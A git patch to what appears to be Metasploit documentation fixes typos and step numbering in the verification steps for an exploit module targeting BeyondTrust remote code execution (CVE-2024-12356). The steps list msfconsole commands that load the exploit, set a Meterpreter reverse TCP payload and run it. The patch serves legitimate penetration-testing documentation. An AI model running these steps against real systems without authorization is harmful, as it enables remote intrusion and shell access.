From c9be9b65ec3aafa67c773e3e33fd2780f07cc4bb Mon Sep 17 00:00:00 2001 From: sfewer-r7 Date: Wed, 12 Feb 2025 17:22:17 +0000 Subject: [PATCH] fix typos in docs --- .../exploit/linux/http/beyondtrust_rce_cve_2024_12356.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/documentation/modules/exploit/linux/http/beyondtrust_rce_cve_2024_12356.md b/documentation/modules/exploit/linux/http/beyondtrust_rce_cve_2024_12356.md index 1985d51646..f458505773 100644 --- a/documentation/modules/exploit/linux/http/beyondtrust_rce_cve_2024_12356.md +++ b/documentation/modules/exploit/linux/http/beyondtrust_rce_cve_2024_12356.md @@ -11,13 +11,13 @@ to acquire the relevant software packages. ## Verification Steps 1. Start msfconsole -2. `use exploit/linux/http/beyondtrust_rce_cve_2024_12356.` +2. `use exploit/linux/http/beyondtrust_rce_cve_2024_12356` 3. `set RHOST ` 4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp` 5. `set LHOST eth0` -5. `set LPORT 4444` -6. `check` -7. `exploit` +6. `set LPORT 4444` +7. `check` +8. `exploit` ## Options